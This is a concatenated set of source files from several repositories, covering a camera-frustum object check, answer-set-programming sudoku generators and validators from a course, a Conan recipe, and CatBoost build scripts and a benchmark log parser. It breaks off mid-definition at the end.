return object_name
return ''
except Exception as ex:
raise GenericRolloutException("Unable to detect collision {}".format(ex))
def get_objects_in_camera_frustums(self, agent_name, car_pose, object_order=None):
"""Returns list of tuple (idx, object.pose) for the objects
that are in camera frustums"""
frustum = FrustumManager.get_instance().get(agent_name=agent_name)
frustum.update(car_pose)
objects_in_frustum = []
object_order = object_order if object_order is not None else range(len(self.object_poses.values()))
object_poses = [pose for pose in self.object_poses.values()]
object_dims = [pose for pose in self.object_dims.values()]
for idx, order_idx in enumerate(object_order):
object_pose = object_poses[order_idx]
object_dim = object_dims[order_idx]
object_position = np.array([object_pose.position.x,
object_pose.position.y,
object_pose.position.z])
object_points = TrackData.get_object_bounding_rect(object_pose, object_dim)
object_points.append(object_position)
# Check collision between frustum and object points
# object points contains object position + points in bounding rectangle on the floor
# Camera pitch and roll are fixed so checking bounding rectangle on the floor should be good enough
# One edge case that this detection can miss is similar as below:
# FFFFFFFFFFFFFFF
# F F
# AAAFAAAAAAAAAAAFAAAAAAAAAAAAAA
# A F F A
# A F F X A
# AAAAAAFAAAAAFAAAAAAAAAAAAAAAAA
# F F
# FFF
# F = frustum / A = object / X = center of mass of the object
if any([frustum.is_visible(p) for p in object_points]):
objects_in_frustum.append((idx, object_pose))
return objects_in_frustum
``` |
{
"source": "jochemloedeman/KRR-course-2021",
"score": 3
} |
#### File: KRR-course-2021/hw2/generate_inputs_asp.py
```python
import clingo
from sudoku_asp import get_definitions, get_input_encoding, get_generate_encoding, get_constraints_encoding, \
to_solution_rep
from sudoku_func import pretty_repr
def get_hide_encoding(given):
hide_encoding = """"""
hide_encoding += """
{ hide(R,C): cell(R,C,_) }.
input(R,C,X) :- solution(R,C,X), not hide(R,C).
"""
hide_encoding += f":- not {given} {{ input(R,C,X) : cell(R,C,_), value(X) }} {given}.\n"
return hide_encoding
def get_saturation_encoding():
saturation_encoding = """"""
# generate all candidates for other solutions
saturation_encoding += "other_solution(R,C,X) : value(X) :- cell(R,C,_).\n"
# solutions are invalid when they do not match the input sudoku, and are incorrect when they do not
# satisfy the constraints of BombKnight sudoku
saturation_encoding += """
invalid :- input(R,C,X), other_solution(R,C,Y), X!=Y.
incorrect :- other_solution(R,C,X), other_solution(R,D,Y), C!=D, X==Y.
incorrect :- other_solution(R,C,X), other_solution(S,C,Y), R!=S, X==Y.
incorrect :- cell(R,C,A), cell(S,D,B), A!=B, block(A,V,H), block(B,Z,W), other_solution(R,C,X), other_solution(S,D,Y), V==Z, H==W, X==Y.
incorrect :- cell(R,C,A), cell(S,D,B), A!=B, adjacent(A,B), other_solution(R,C,X), other_solution(S,D,Y), X==Y.
incorrect :- cell(R,C,A), cell(S,D,B), A!=B, knight(A,B), other_solution(R,C,X), other_solution(S,D,Y), X==Y.
"""
# other solutions identical to the original solution are also incorrect
saturation_encoding += """
incorrect :- other_solution(R,C,X) : solution(R,C,X).
"""
# now saturate when invalid and/or incorrect
saturation_encoding += """
saturate :- invalid.
saturate :- incorrect.
other_solution(R,C,X) :- cell(R,C,_), value(X), saturate.
invalid :- saturate.
incorrect :- saturate.
:- not saturate.
"""
return saturation_encoding
def get_input_sudokus(k, given):
asp_program = """"""
asp_program += get_definitions(k)
asp_program += get_input_encoding(k)
asp_program += get_generate_encoding()
asp_program += get_constraints_encoding()
asp_program += get_hide_encoding(given)
asp_program += get_saturation_encoding()
# suppress annoying warning
asp_program += "#defined supplied/3.\n"
asp_program += "#show input/3."
file = open("generate_inputs_asp.py.txt", "w")
file.truncate(0)
file.write(asp_program)
file.close()
control = clingo.Control()
control.add("base", [], asp_program)
control.ground([("base", [])])
control.configuration.solve.models = 0
with control.solve(yield_=True) as handle:
for model in handle:
yield model
def to_input_rep(answer_set, k):
solution = []
for _ in range(k * k):
solution.append([0] * k * k)
entries = str(answer_set).split()
for entry in entries:
entry = entry.removesuffix(")")
entry = entry.removeprefix("input(")
arguments = [int(x) for x in entry.split(',')]
solution[arguments[0]][arguments[1]] = arguments[2]
return solution
def generate_input_sudokus(k, given):
for answer_set in get_input_sudokus(k, given):
yield to_input_rep(answer_set, k)
if __name__ == '__main__':
k = 3
given = 10
for input_sudoku in generate_input_sudokus(k, given):
print(pretty_repr(input_sudoku, k))
```
#### File: KRR-course-2021/hw2/sudoku_func.py
```python
import itertools
from copy import deepcopy
from dataclasses import dataclass
from typing import List
import clingo
from pysat.formula import CNF
from pysat.solvers import MinisatGH
@dataclass
class TestInput:
k: int
sudoku: List[List[int]]
num_solutions: int
test_inputs = [
TestInput(
k=3,
sudoku=[[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 3, 0, 0, 8, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 4, 0, 0, 0, 5],
[0, 0, 0, 0, 0, 0, 0, 2, 7],
[0, 0, 0, 0, 0, 0, 3, 0, 0],
[0, 0, 0, 0, 0, 0, 9, 0, 0],
[0, 0, 0, 0, 5, 6, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]],
num_solutions=1
),
TestInput(
k=3,
sudoku=[[9, 5, 6, 1, 2, 4, 0, 0, 0],
[3, 7, 8, 9, 5, 6, 0, 0, 0],
[1, 2, 4, 3, 7, 8, 0, 0, 0],
[8, 9, 5, 6, 1, 2, 0, 0, 0],
[4, 3, 7, 8, 9, 5, 0, 0, 0],
[6, 1, 2, 4, 3, 0, 0, 0, 0],
[7, 8, 9, 5, 6, 0, 0, 0, 0],
[2, 4, 3, 7, 8, 0, 0, 0, 0],
[5, 6, 1, 2, 4, 0, 0, 0, 0]],
num_solutions=1
),
TestInput(
k=3,
sudoku=[[9, 5, 6, 0, 0, 4, 0, 0, 0],
[3, 7, 8, 9, 5, 6, 0, 0, 0],
[0, 0, 4, 3, 7, 8, 0, 0, 0],
[8, 9, 5, 6, 0, 0, 0, 0, 0],
[4, 3, 7, 8, 9, 5, 0, 0, 0],
[6, 0, 0, 4, 3, 0, 0, 0, 0],
[7, 8, 9, 5, 6, 0, 0, 0, 0],
[0, 4, 3, 7, 8, 0, 0, 0, 0],
[5, 6, 0, 0, 4, 0, 0, 0, 0]],
num_solutions=2
),
TestInput(
k=3,
sudoku=[[9, 0, 0, 0, 0, 4, 0, 0, 0],
[3, 0, 0, 0, 0, 6, 0, 0, 0],
[1, 0, 0, 0, 0, 8, 0, 0, 0],
[8, 0, 0, 0, 0, 0, 0, 0, 0],
[4, 0, 0, 0, 0, 0, 0, 0, 0],
[6, 0, 0, 0, 0, 0, 0, 0, 0],
[7, 0, 0, 0, 0, 0, 0, 0, 0],
[2, 0, 0, 0, 0, 0, 0, 0, 0],
[5, 0, 0, 0, 0, 0, 0, 0, 0]],
num_solutions=1
),
TestInput(
k=4,
sudoku=[[3, 1, 15, 13, 7, 16, 5, 12, 4, 2, 14, 10, 8, 9, 6, 0],
[6, 4, 5, 8, 9, 11, 2, 10, 16, 15, 7, 3, 1, 14, 13, 0],
[10, 7, 14, 2, 15, 6, 1, 13, 9, 11, 8, 12, 4, 16, 3, 0],
[12, 16, 9, 11, 3, 14, 4, 8, 6, 5, 1, 13, 2, 15, 7, 0],
[4, 2, 10, 1, 16, 9, 12, 0, 3, 7, 15, 14, 5, 6, 8, 0],
[9, 8, 3, 6, 4, 5, 13, 0, 1, 16, 12, 11, 7, 10, 2, 0],
[15, 13, 12, 14, 2, 8, 7, 0, 5, 10, 4, 9, 3, 1, 11, 0],
[11, 5, 16, 7, 10, 1, 14, 0, 2, 8, 13, 6, 12, 4, 9, 0],
[8, 10, 2, 3, 11, 4, 15, 0, 12, 1, 5, 7, 16, 13, 14, 0],
[16, 9, 13, 15, 8, 12, 6, 0, 14, 3, 10, 2, 11, 5, 1, 0],
[7, 14, 11, 0, 1, 2, 10, 0, 15, 13, 6, 4, 9, 8, 0, 0],
[1, 12, 6, 0, 14, 13, 3, 0, 8, 9, 11, 16, 15, 2, 0, 0],
[13, 3, 7, 0, 12, 15, 9, 0, 10, 14, 2, 1, 6, 11, 0, 0],
[14, 0, 1, 0, 5, 7, 16, 0, 11, 6, 3, 8, 13, 12, 0, 0],
[0, 0, 4, 0, 6, 3, 8, 0, 13, 12, 16, 5, 10, 7, 0, 0],
[5, 6, 8, 12, 13, 10, 11, 1, 7, 4, 9, 15, 14, 3, 0, 2]],
num_solutions=1
)
]
def check_solution(sudoku, k, solution):
"""
Checks if a given solution for a given BombKnightSudoku puzzle is correct.
"""
# Check if each row in the solution has different values
for row in solution:
if set(row) != set(range(1, k**2+1)):
return False
# Check if each row in the solution has different values
for col in range(0, k**2):
if {solution[row][col]
for row in range(0, k**2)
} != set(range(1, k**2+1)):
return False
# Check the 'bomb' constraints
for row1, col1 in itertools.product(range(0, k**2), repeat=2):
for row_add, col_add in itertools.product([-1, 0, 1], repeat=2):
if row_add != 0 or col_add != 0:
row2 = row1 + row_add
col2 = col1 + col_add
if 0 <= row2 < k**2 and 0 <= col2 < k**2:
if solution[row1][col1] == solution[row2][col2]:
return False
# Check the 'knight' constraints
for row1, col1 in itertools.product(range(0, k**2), repeat=2):
for row_add, col_add in [(1, 2), (1, -2), (-1, 2), (-1, -2),
(2, 1), (-2, 1), (2, -1), (-2, -1)]:
if row_add != 0 or col_add != 0:
row2 = row1 + row_add
col2 = col1 + col_add
if 0 <= row2 < k**2 and 0 <= col2 < k**2:
if solution[row1][col1] == solution[row2][col2]:
return False
# Check if each block in the solution has different values
for block_row, block_col in itertools.product(range(0, k), repeat=2):
if {solution[block_row*k + inner_row][block_col*k + inner_col]
for inner_row, inner_col
in itertools.product(range(0, k), repeat=2)
} != set(range(1, k**2+1)):
return False
# Check if the solution matches the input
for row, col in itertools.product(range(0, k**2), repeat=2):
if sudoku[row][col] != 0 and sudoku[row][col] != solution[row][col]:
return False
# If all checks passed, return True
return True
def check_num_solutions(sudoku, k, num_solutions, solver):
"""
Checks if a given solving algorithm produces the right number of correct
solutions for a given BombKnightSudoku puzzle.
"""
# Iterate over num_solutions+1 solutions, check if each is correct,
# and add their string representations to a set
solution_set = set()
for solution in itertools.islice(solver(sudoku, k), num_solutions+1):
if not check_solution(sudoku, k, solution):
return False
solution_set.add(pretty_repr(solution, k))
# Return whether the set contains exactly the right amount of solutions
return len(solution_set) == num_solutions
def pretty_repr(sudoku, k):
"""
Produces a pretty representation of a sodoku or solution.
"""
repr_sudoku = ""
numwidth = len(str(k**2))
def pretty_line(k):
return "." + ".".join(["-"*((numwidth+1)*k+1)]*k) + ".\n"
# Add a line separator at the beginning
repr_sudoku += pretty_line(k)
# Go through all rows of the sudoku
for rownum in range(0, k**2):
# Add a row of the sudoku
repr_sudoku += "| "
for outer_col in range(0, k):
for inner_col in range(0, k):
if sudoku[rownum][outer_col*k+inner_col] != 0:
repr_sudoku += str(
sudoku[rownum][outer_col*k+inner_col]
).zfill(numwidth) + " "
else:
repr_sudoku += " "*numwidth + " "
repr_sudoku += "| "
repr_sudoku += "\n"
# Add a line separator after every k'th row
if (rownum+1) % k == 0:
repr_sudoku += pretty_line(k)
# Return the constructed string (without trailing '\n')
return repr_sudoku[:-1]
``` |
{
"source": "jochemsoons/KRR-course-2021",
"score": 4
} |
#### File: KRR-course-2021/hw1/hw1.py
```python
import clingo
def print_answer_sets(program):
# Load the answer set program, and call the grounder
control = clingo.Control()
control.add("base", [], program)
control.ground([("base", [])])
# Define a function that will be called when an answer set is found
# This function sorts the answer set alphabetically, and prints it
def on_model(model):
sorted_model = [str(atom) for atom in model.symbols(shown=True)]
sorted_model.sort()
print("Answer set: {{{}}}".format(", ".join(sorted_model)))
# Ask clingo to find all models (using an upper bound of 0 gives all models)
control.configuration.solve.models = 0
# Call the clingo solver, passing on the function on_model for when an answer set is found
answer = control.solve(on_model=on_model)
# Print a message when no answer set was found
if answer.satisfiable == False:
print("No answer sets")
""" EXERCISE 2 """
``` |
{
"source": "Jochen0x90h/PicSort",
"score": 2
} |
#### File: Jochen0x90h/PicSort/conanfile.py
```python
import os, shutil
from conans import ConanFile, CMake
# linux:
# install conan: pip3 install --user conan
# upgrade conan: pip3 install --upgrade --user conan
# macos:
# install conan: brew install conan
# create default profile: conan profile new default --detect
# create debug profile: copy ~/.conan/profiles/default to Debug, replace Release by Debug
def copy(src, dst):
if os.path.islink(src):
if os.path.lexists(dst):
os.unlink(dst)
linkto = os.readlink(src)
os.symlink(linkto, dst)
else:
shutil.copy(src, dst)
class Project(ConanFile):
name = "PicSorter"
description = "Tool for sorting pictures"
url = "https://github.com/Jochen0x90h/PicSort"
license = "MIT License"
settings = "os", "compiler", "build_type", "arch"
options = {
"debug": [False, True]}
default_options = {
"debug": False}
generators = "cmake"
exports_sources = "conanfile.py", "CMakeLists.txt", "src/*", "test/*"
requires = \
"boost/1.76.0", \
"glfw/3.3.3", \
"imgui/1.83", \
"libjpeg-turbo/2.0.5", \
"tinyxml2/8.0.0"
keep_imports = True
def imports(self):
# copy dependent libraries into the build folder
self.copy("*", src="@bindirs", dst="bin")
self.copy("*", src="@libdirs", dst="lib")
def configure_cmake(self):
cmake = CMake(self, build_type = "RelWithDebInfo" if self.options.debug and self.settings.build_type == "Release" else None)
cmake.configure()
return cmake
def build(self):
cmake = self.configure_cmake()
cmake.build()
def package(self):
# install from build directory into package directory
cmake = self.configure_cmake()
cmake.install()
# also copy dependent libraries into the package
self.copy("*.dll", "bin", "bin")
self.copy("*.dylib*", "lib", "lib", symlinks = True)
self.copy("*.so*", "lib", "lib", symlinks = True)
def package_info(self):
self.cpp_info.name = self.name
def deploy(self):
# install if CONAN_INSTALL_PREFIX env variable is set
prefix = os.getenv("CONAN_INSTALL_PREFIX")
if prefix == None:
print("set CONAN_INSTALL_PREFIX env variable to install to local directory, e.g.")
print("export CONAN_INSTALL_PREFIX=$HOME/.local")
else:
print(f"Installing {self.name} to {prefix}")
# create destination directories if necessary
dstBinPath = os.path.join(prefix, "bin")
if not os.path.exists(dstBinPath):
os.mkdir(dstBinPath)
#print(f"dstBinPath: {dstBinPath}")
dstLibPath = os.path.join(prefix, "lib")
if not os.path.exists(dstLibPath):
os.mkdir(dstLibPath)
#print(f"dstLibPath: {dstLibPath}")
# copy executables
for bindir in self.cpp_info.bindirs:
srcBinPath = os.path.join(self.cpp_info.rootpath, bindir)
#print(f"srcBinPath {srcBinPath}")
if os.path.isdir(srcBinPath):
files = os.listdir(srcBinPath)
for file in files:
print(f"install {file}")
src = os.path.join(srcBinPath, file)
dst = os.path.join(dstBinPath, file)
if os.path.isfile(src):
copy(src, dst)
# copy libraries
for libdir in self.cpp_info.libdirs:
srcLibPath = os.path.join(self.cpp_info.rootpath, libdir)
#print(f"srcLibPath {srcLibPath}")
if os.path.isdir(srcLibPath):
files = os.listdir(srcLibPath)
for file in files:
print(f"install {file}")
src = os.path.join(srcLibPath, file)
dst = os.path.join(dstLibPath, file)
if os.path.isfile(src):
copy(src, dst)
``` |
{
"source": "jochenater/catboost",
"score": 2
} |
#### File: python/tests/test_common.py
```python
import subprocess
import pytest
from build.platform.python.tests import testlib
PYTHON_VERSIONS = ["2.7", "3.4", "3.5", "3.6"] # 3.7, 3.8 are not runnable
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_version_matched(pyver):
testlib.check_python_version(pyver)
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_max_unicode_bytes(pyver):
cmd = [testlib.get_python_bin(pyver), '-c', 'import sys; print(sys.maxunicode)']
maxunicode = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('utf-8')
assert int(maxunicode) > 65535, "Found UCS2 build"
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_imports(pyver):
imports = {
"2.7": ['pkg_resources'],
"3.4": [],
"3.5": ['pkg_resources'],
"3.6": [],
}
for imp in imports[pyver]:
subprocess.check_call([testlib.get_python_bin(pyver), '-c', 'import ' + imp])
```
#### File: build/plugins/cpp_style.py
```python
import os
from _common import sort_by_keywords
def on_style(unit, *args):
def it():
yield 'DONT_PARSE'
for f in args:
f = f[len('${ARCADIA_ROOT}') + 1:]
if '/generated/' in f:
continue
yield f
yield '/cpp_style/files/' + f
unit.onresource(list(it()))
```
#### File: build/plugins/credits.py
```python
from _common import rootrel_arc_src
def oncredits_disclaimer(unit, *args):
if unit.get('WITH_CREDITS'):
unit.message(["warn", "CREDITS WARNING: {}".format(' '.join(args))])
def oncheck_contrib_credits(unit, *args):
module_path = rootrel_arc_src(unit.path(), unit)
excepts = set()
if 'EXCEPT' in args:
args = list(args)
except_pos = args.index('EXCEPT')
excepts = set(args[except_pos + 1:])
args = args[:except_pos]
for arg in args:
if module_path.startswith(arg) and not unit.get('CREDITS_TEXTS_FILE') and not unit.get('NO_CREDITS_TEXTS_FILE'):
for ex in excepts:
if module_path.startswith(ex):
break
else:
unit.message(["error", "License texts not found. See https://st.yandex-team.ru/DTCC-324"])
```
#### File: package_manager/base/lockfile.py
```python
import os
from abc import ABCMeta, abstractmethod
from six import add_metaclass
class LockfilePackageMeta(object):
"""
Basic struct representing package meta from lockfile.
"""
__slots__ = ("name", "version", "sky_id", "integrity", "integrity_algorithm", "tarball_path")
@staticmethod
def from_str(s):
return LockfilePackageMeta(*s.strip().split(" "))
def __init__(self, name, version, sky_id, integrity, integrity_algorithm):
self.name = name
self.version = version
self.sky_id = sky_id
self.integrity = integrity
self.integrity_algorithm = integrity_algorithm
self.tarball_path = "{}-{}.tgz".format(name, version)
def to_str(self):
return " ".join([self.name, self.version, self.sky_id, self.integrity, self.integrity_algorithm])
class LockfilePackageMetaInvalidError(RuntimeError):
pass
@add_metaclass(ABCMeta)
class BaseLockfile(object):
@classmethod
def load(cls, path):
"""
:param path: lockfile path
:type path: str
:rtype: BaseLockfile
"""
pj = cls(path)
pj.read()
return pj
def __init__(self, path):
if not os.path.isabs(path):
raise TypeError("Absolute path required, given: {}".format(path))
self.path = path
self.data = None
@abstractmethod
def read(self):
pass
@abstractmethod
def write(self, path=None):
pass
@abstractmethod
def get_packages_meta(self):
pass
@abstractmethod
def update_tarball_resolutions(self, fn):
pass
```
#### File: package_manager/pnpm/lockfile.py
```python
import base64
import binascii
import yaml
import os
from six.moves.urllib import parse as urlparse
from six import iteritems
from ..base import PackageJson, BaseLockfile, LockfilePackageMeta, LockfilePackageMetaInvalidError
class PnpmLockfile(BaseLockfile):
IMPORTER_KEYS = PackageJson.DEP_KEYS + ("specifiers",)
def read(self):
with open(self.path, "r") as f:
self.data = yaml.load(f, Loader=yaml.CSafeLoader)
def write(self, path=None):
"""
:param path: path to store lockfile, defaults to original path
:type path: str
"""
if path is None:
path = self.path
with open(path, "w") as f:
yaml.dump(self.data, f, Dumper=yaml.CSafeDumper)
def get_packages_meta(self):
"""
Extracts packages meta from lockfile.
:rtype: list of LockfilePackageMeta
"""
packages = self.data.get("packages", {})
return map(lambda x: _parse_package_meta(*x), iteritems(packages))
def update_tarball_resolutions(self, fn):
"""
:param fn: maps `LockfilePackageMeta` instance to new `resolution.tarball` value
:type fn: lambda
"""
packages = self.data.get("packages", {})
for key, meta in iteritems(packages):
meta["resolution"]["tarball"] = fn(_parse_package_meta(key, meta))
packages[key] = meta
def get_importers(self):
"""
Returns "importers" section from the lockfile or creates similar structure from "dependencies" and "specifiers".
:rtype: dict of dict of dict of str
"""
importers = self.data.get("importers")
if importers is not None:
return importers
importer = {k: self.data[k] for k in self.IMPORTER_KEYS if k in self.data}
return ({".": importer} if importer else {})
def merge(self, lf):
"""
Merges two lockfiles:
1. Converts the lockfile to monorepo-like lockfile with "importers" section instead of "dependencies" and "specifiers".
2. Merges `lf`'s dependencies and specifiers to importers.
3. Merges `lf`'s packages to the lockfile.
:param lf: lockfile to merge
:type lf: PnpmLockfile
"""
importers = self.get_importers()
build_path = os.path.dirname(self.path)
for [importer, imports] in iteritems(lf.get_importers()):
importer_path = os.path.normpath(os.path.join(os.path.dirname(lf.path), importer))
importer_rel_path = os.path.relpath(importer_path, build_path)
importers[importer_rel_path] = imports
self.data["importers"] = importers
for k in self.IMPORTER_KEYS:
self.data.pop(k, None)
packages = self.data.get("packages", {})
for k, v in iteritems(lf.data.get("packages", {})):
if k not in packages:
packages[k] = v
self.data["packages"] = packages
def _parse_package_meta(key, meta):
"""
:param key: uniq package key from lockfile
:type key: string
:param meta: package meta dict from lockfile
:type meta: dict
:rtype: LockfilePackageMetaInvalidError
"""
try:
name, version = _parse_package_key(key)
sky_id = _parse_sky_id_from_tarball_url(meta["resolution"]["tarball"])
integrity_algorithm, integrity = _parse_package_integrity(meta["resolution"]["integrity"])
except KeyError as e:
raise TypeError("Invalid package meta for key {}, missing {} key".format(key, e))
except LockfilePackageMetaInvalidError as e:
raise TypeError("Invalid package meta for key {}, parse error: {}".format(key, e))
return LockfilePackageMeta(name, version, sky_id, integrity, integrity_algorithm)
def _parse_package_key(key):
"""
:param key: package key in format "/({scope}/)?{package_name}/{package_version}(_{peer_dependencies})?"
:type key: string
:return: tuple of scoped package name and version
:rtype: (str, str)
"""
try:
tokens = key.split("/")[1:]
version = tokens.pop().split("_", 1)[0]
if len(tokens) < 1 or len(tokens) > 2:
raise TypeError()
except (IndexError, TypeError):
raise LockfilePackageMetaInvalidError("Invalid package key")
return ("/".join(tokens), version)
def _parse_sky_id_from_tarball_url(tarball_url):
"""
:param tarball_url: tarball url
:type tarball_url: string
:return: sky id
:rtype: string
"""
if tarball_url.startswith("file:"):
return ""
rbtorrent_param = urlparse.parse_qs(urlparse.urlparse(tarball_url).query).get("rbtorrent")
if rbtorrent_param is None:
raise LockfilePackageMetaInvalidError("Missing rbtorrent param in tarball url {}".format(tarball_url))
return "rbtorrent:{}".format(rbtorrent_param[0])
def _parse_package_integrity(integrity):
"""
:param integrity: package integrity in format "{algo}-{base64_of_hash}"
:type integrity: string
:return: tuple of algorithm and hash (hex)
:rtype: (str, str)
"""
algo, hash_b64 = integrity.split("-", 1)
try:
hash_hex = binascii.hexlify(base64.b64decode(hash_b64))
except TypeError as e:
raise LockfilePackageMetaInvalidError("Invalid package integrity encoding, integrity: {}, error: {}".format(integrity, e))
return (algo, hash_hex)
```
#### File: build/scripts/build_java_with_error_prone.py
```python
import sys
import os
ERROR_PRONE_FLAGS = [
'-Xep:FunctionalInterfaceMethodChanged:WARN',
'-Xep:ReturnValueIgnored:WARN',
]
JAVA10_EXPORTS = [
'--add-exports=jdk.compiler/com.sun.tools.javac.api=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.util=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.tree=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.main=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.code=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.processing=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.parser=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.comp=ALL-UNNAMED'
]
def just_do_it(argv):
java, error_prone_tool, javac_cmd = argv[0], argv[1], argv[2:]
if java.endswith('javac') or java.endswith('javac.exe'):
for f in javac_cmd:
if f.startswith('-Xep'):
ERROR_PRONE_FLAGS.append(f)
for f in ERROR_PRONE_FLAGS:
if f in javac_cmd:
javac_cmd.remove(f)
os.execv(java, [java] + JAVA10_EXPORTS + ['-processorpath', error_prone_tool, '-XDcompilePolicy=byfile'] + [(' '.join(['-Xplugin:ErrorProne'] + ERROR_PRONE_FLAGS))] + javac_cmd)
else:
os.execv(java, [java, '-Xbootclasspath/p:' + error_prone_tool, 'com.google.errorprone.ErrorProneCompiler'] + ERROR_PRONE_FLAGS + javac_cmd)
if __name__ == '__main__':
just_do_it(sys.argv[1:])
```
#### File: build/scripts/compile_pysrc.py
```python
import argparse
import os
import shutil
import subprocess
import tarfile
LIMIT = 6000
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--input', required=True)
parser.add_argument('--output', required=True)
parser.add_argument('--rescompiler', required=True)
subparsers = parser.add_subparsers(dest='mode')
parser_py2 = subparsers.add_parser('py2')
parser_py2.add_argument('--py_compile', required=True)
parser_py2.add_argument('--python', required=True)
parser_py3 = subparsers.add_parser('py3')
parser_py3.add_argument('--pycc', required=True)
return parser.parse_args()
def call(cmd, cwd=None, env=None):
return subprocess.check_output(cmd, stdin=None, stderr=subprocess.STDOUT, cwd=cwd, env=env)
def iterate_py2_resource_params(py_files):
for py in py_files:
mod = py[:-3].replace('/', '.')
key = '/py_modules/{}'.format(mod)
yield py, key
yield '-', 'resfs/src/{}={}'.format(key, py)
yield '{}.yapyc'.format(py), '/py_code/{}'.format(mod)
def iterate_py3_resource_params(py_files):
for py in py_files:
for ext in ('', '.yapyc3'):
path = '{}{}'.format(py, ext)
dest = 'py/{}'.format(path)
key = 'resfs/file/{}'.format(dest)
src = 'resfs/src/{}={}'.format(key, os.path.basename(path))
yield '-', src
yield path, key
def main():
args = parse_args()
names = []
with tarfile.open(args.input, 'r') as tar:
names = tar.getnames()
tar.extractall()
if args.mode == 'py3':
pycc_cmd = [args.pycc]
pycc_ext = '.yapyc3'
iterate_resource_params = iterate_py3_resource_params
else:
pycc_cmd = [args.python, args.py_compile]
pycc_ext = '.yapyc'
iterate_resource_params = iterate_py2_resource_params
py_files = sorted(names)
for py in py_files:
cmd = pycc_cmd + ['{}-'.format(os.path.basename(py)), py, '{}{}'.format(py, pycc_ext)]
call(cmd)
outputs = []
cmd = [args.rescompiler, '{}.0'.format(args.output)]
size = 0
for path, key in iterate_resource_params(py_files):
addendum = len(path) + len(key)
if size + addendum > LIMIT and len(cmd) > 2:
call(cmd)
outputs.append(cmd[1])
cmd[1] = '{}.{}'.format(args.output, len(outputs))
cmd = cmd[0:2]
size = 0
cmd.extend([path, key])
size += addendum
if len(outputs) == 0:
cmd[1] = args.output
call(cmd)
else:
call(cmd)
outputs.append(cmd[1])
with open(args.output, 'w') as fout:
for fname in outputs:
with open(fname, 'r') as fin:
shutil.copyfileobj(fin, fout)
if __name__ == '__main__':
main()
```
#### File: build/scripts/cpp_flatc_wrapper.py
```python
import os
import subprocess
import sys
def main():
cmd = sys.argv[1:]
h_file = None
try:
index = cmd.index('-o')
h_file = cmd[index+1]
cmd[index+1] = os.path.dirname(h_file)
except (ValueError, IndexError):
pass
p = subprocess.Popen(cmd, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if p.returncode:
if out:
sys.stderr.write('stdout:\n{}\n'.format(out))
if err:
sys.stderr.write('stderr:\n{}\n'.format(err))
sys.exit(p.returncode)
if h_file and h_file.endswith(('.fbs.h', '.fbs64.h')):
cpp_file = '{}.cpp'.format(h_file[:-2])
with open(cpp_file, 'w') as f:
f.write('#include "{}"\n'.format(os.path.basename(h_file)))
sys.exit(0)
if __name__ == '__main__':
main()
```
#### File: build/scripts/wrap_groovyc.py
```python
import platform
import sys
import os
import subprocess
def fix_windows(args):
for arg in args:
if os.path.basename(arg) == 'groovyc' and os.path.basename(os.path.dirname(arg)) == 'bin':
yield arg + '.bat'
else:
yield arg
if __name__ == '__main__':
env = os.environ.copy()
jdk = sys.argv[1]
env['JAVA_HOME'] = jdk
args = sys.argv[2:]
if platform.system() == 'Windows':
sys.exit(subprocess.Popen(list(fix_windows(args)), env=env).wait())
else:
os.execve(args[0], args, env)
```
#### File: benchmarks/training_speed/log_parser.py
```python
import json
import os
import re
from collections import namedtuple
import numpy as np
ALGORITHMS = [method + '-' + device_type
for device_type in ['CPU', 'GPU']
for method in ['catboost', 'xgboost', 'lightgbm']]
TIME_REGEX = r'Time: \[\s*(\d+\.?\d*)\s*\]\t'
ELAPSED_REGEX = re.compile(r'Elapsed: (\d+\.?\d*)')
LOG_LINE_REGEX = {
'lightgbm': re.compile(TIME_REGEX + r'\[(\d+)\]\tvalid_0\'s (\w+): (\d+\.?\d*)'),
'xgboost': re.compile(TIME_REGEX + r'\[(\d+)\]\t([a-zA-Z\-]+):(\d+\.?\d*)'),
'catboost': re.compile(TIME_REGEX + r'(\d+)'),
'catboost-tsv': re.compile(r'(\d+)(\t(\d+\.?\d*))+\n')
}
class Track:
param_regex = re.compile(r'(\w+)\[(\d+\.?\d*)\]')
def __init__(self, algorithm_name, experiment_name, task_type, parameters_str, time_series, scores, duration):
self.log_name = parameters_str
self.algorithm_name = algorithm_name
self.scores = scores
self.experiment_name = experiment_name
self.task_type = task_type
self.duration = duration
self.parameters_str = parameters_str
assert len(time_series), "Empty time series may indicate that this benchmark failed to parse logs for " + str(algorithm_name)
for i in range(1, time_series.shape[0]):
if time_series[i] - time_series[i - 1] < 0.:
time_series[i:] = time_series[i:] + 60.
dur_series = time_series[-1] - time_series[0]
diff_elapsed_time = np.abs(dur_series - duration)
if diff_elapsed_time > 100:
print(parameters_str)
print('WARNING: difference ' + str(diff_elapsed_time) + ' in calculated duration may indicate broken log.')
self.time_series = time_series
assert(np.all(self.time_series - self.time_series[0] >= 0.))
self.time_per_iter = time_series[1:] - time_series[:-1]
params = Track.param_regex.findall(parameters_str)
param_keys = []
param_values = []
for param in sorted(params, key=lambda x: x[0]):
param_keys.append(param[0])
param_values.append(float(param[1]))
self.params_type = namedtuple('Params', param_keys)
self.params = self.params_type(*param_values)
self.params_dict = {key: value for key, value in zip(param_keys, param_values)}
def __str__(self):
params_str = ''
for i, field in enumerate(self.params._fields):
if field == 'iterations':
continue
params_str += ', ' + field + ':' + str(self.params[i])
return self.algorithm_name + params_str
def __eq__(self, other):
return self.algorithm_name == other.owner_name and self.params == other.params
@staticmethod
def hash(experiment_name, algorithm_name, task_type, parameters_str):
return hash(experiment_name + algorithm_name + task_type + parameters_str)
def __hash__(self):
